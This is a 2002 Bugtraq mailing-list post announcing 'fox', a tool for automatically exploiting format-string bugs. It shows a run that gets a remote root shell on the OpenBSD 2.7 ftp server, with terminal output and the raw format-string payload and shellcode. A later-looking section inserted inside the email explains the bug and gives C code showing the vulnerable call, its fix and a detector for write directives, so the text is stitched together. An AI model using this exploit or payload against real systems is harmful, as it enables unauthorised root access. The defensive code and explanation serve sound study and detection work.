[25170] in bugtraq


Re: Howto exploit a remote format bug automatically

daemon@ATHENA.MIT.EDU (Fredrik Widlund)
Fri Apr 19 14:51:18 2002

Message-Id: <200204191157.g3JBvrtc026085@wolf.defcom.com>
From: Fredrik Widlund <fredrik.widlund@defcom.com>
To: bugtraq@securityfocus.com
Date: Fri, 19 Apr 2002 12:57:52 +0100
In-Reply-To: <20020418162537.B20505@minimum.inria.fr>
MIME-Version: 1.0
Content-Type: Multipart/Mixed;
  boundary="------------Boundary-00=_G8DTMRLFN9TRKPV7TK5X"

--------------Boundary-00=_G8DTMRLFN9TRKPV7TK5X
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Hi

"fox", a tool I wrote for automatically exploiting any (or most) format bugs,
locally and remotely. Runs on OpenBSD and not ported to other platforms,
though it should be very straightforward.

The only requirement is that you get the actual printed string back to the
program; in the case of the OpenBSD 2.7 ftpd you need to proxy this through a
small shell program since the output occurs in the process listing.

Should work for exploiting bugs on most little-endian 32-bit machines like the
i386, provided you supply the shellcode.

Includes a trivial local example, and an example of how to point it at the 
OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.

Regards,
Fredrik Widlund

-x-

README for example 2:
Exploiting OpenBSD 2.7 ftp server

Input has to be < 256 characters, working offsets are -18 and -2
Ex:

root@wolf> ./fox -s 220 -p 50 -o-18 ex2/ex2
alignment               0
chars before argument   111
chars before insert     0
argument offset         9
argument pointer offset 0
argument address        0xdfbfd15c
esp                     0xdfbfd138

uid=0(root) gid=0(wheel) groups=0(wheel)
root@wolf> nc 127.0.0.1 21
id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD wolf 2.7 GENERIC#0 i386
cat /etc/hosts
127.0.0.1 AAAA<81>ð<81>Ð<81>¿<81>ßBBBB<81>ñ<81>Ð<81>¿<81>ßCCCC<81>ò<81>Ð<81>¿
<81>ßDDDD<81>ó<81>Ð<81>¿<81>ß%p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn<81>ëI<8B>$<81>Ã1<81>ÉQ<83><81>ÀP<89><81>Ã<83><81>ÃS<89>?<88>K<83><89>X<88>K
<83><81>Ã<89><88>K<83><89>HP<81>¸;UUU%;<81>ª<81>ª<81>ª<81>Í<80>PP<81>¸UUU%<81>ª
<81>ª<81>ª<81>Í<80><81>è<81>²<81>ÿ<81>ÿ<81>ÿ<81>ë<81>´[CODE_BY_LONEWOLF]/bin/shF-cGG/bin/shAxxxxxxxxxxxxx
exit
root@wolf>
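The payload visible in the /etc/hosts line above is a textbook format bug: the ftpd passes attacker text straight to a printf-family function, so `%p` reads the stack back and `%hn` writes to it, and the echoed output is exactly the feedback channel the post says fox needs. The following C program is an added example, not part of the post or of the fox tarball. It shows the defective pattern beside its hardened form and a small detector (an assumed helper named `count_format_directives`, not a routine from the page) that flags `%n`-family write directives in inbound data, the signature a defender would look for in ftpd logs or proxied input.

```c
/* Added example (not code from the original post or from the fox tool):
 * the format-bug pattern that fox automates, its fix, and a detector for
 * %n-family directives in untrusted input. */
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: untrusted text becomes the format argument, so every
 * conversion it carries is interpreted. This is what the OpenBSD 2.7 ftpd
 * did with the string that ended up in the process listing. */
void log_line_vulnerable(char *out, size_t outlen, const char *untrusted)
{
    snprintf(out, outlen, untrusted);   /* format controlled by the peer */
}

/* Hardened pattern: the format is a constant and untrusted text is only ever
 * a %s argument, so '%' characters in it are inert bytes. */
void log_line_fixed(char *out, size_t outlen, const char *untrusted)
{
    snprintf(out, outlen, "%s", untrusted);
}

/* Detection helper (assumed name, not from the page): count conversion
 * specifications in a string and report how many are write directives
 * (%n, %hn, %hhn, %ln, %lln). Returns the total number of conversions
 * and stores the number of %n-family ones in *writes. */
int count_format_directives(const char *s, int *writes)
{
    int total = 0;
    *writes = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')                  /* "%%" is a literal percent sign */
            continue;
        total++;
        /* skip flags, width, precision ("0323" in "%0323x") */
        while (*p && strchr("-+ #0123456789.*", *p))
            p++;
        /* skip length modifiers ("h" in "%hn") */
        while (*p && strchr("hlLqjzt", *p))
            p++;
        if (*p == 'n')
            (*writes)++;
        if (!*p)
            break;                      /* string ended inside a directive */
    }
    return total;
}

/* Convenience predicate for filters and log review: 1 if the input contains
 * any write directive, which benign ftp commands never do. */
int has_write_directive(const char *s)
{
    int writes;
    count_format_directives(s, &writes);
    return writes > 0;
}

int main(void)
{
    /* Constructed sample: the directive part of the payload shown in the
     * post's /etc/hosts line (shellcode and address bytes omitted). */
    const char *probe =
        "%p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn";
    int writes;
    int total = count_format_directives(probe, &writes);
    printf("directives=%d writes=%d flagged=%d\n",
           total, writes, has_write_directive(probe));

    char buf[128];
    log_line_fixed(buf, sizeof buf, probe);
    printf("fixed logger stored %zu bytes verbatim\n", strlen(buf));
    return 0;
}
```

The detector deliberately tolerates the width and length fields because that is where probes hide (`%0323x` pads to steer the byte count that `%hn` then writes); a rule that only greps for the literal `%n` misses every `%hn` in the sample above.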
--------------Boundary-00=_G8DTMRLFN9TRKPV7TK5X
Content-Type: application/x-gzip;
  name="fox0.1.tgz"
Content-Transfer-Encoding: base64
Content-Description: format bug exploiter
Content-Disposition: attachment; filename="fox0.1.tgz"
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=

--------------Boundary-00=_G8DTMRLFN9TRKPV7TK5X--
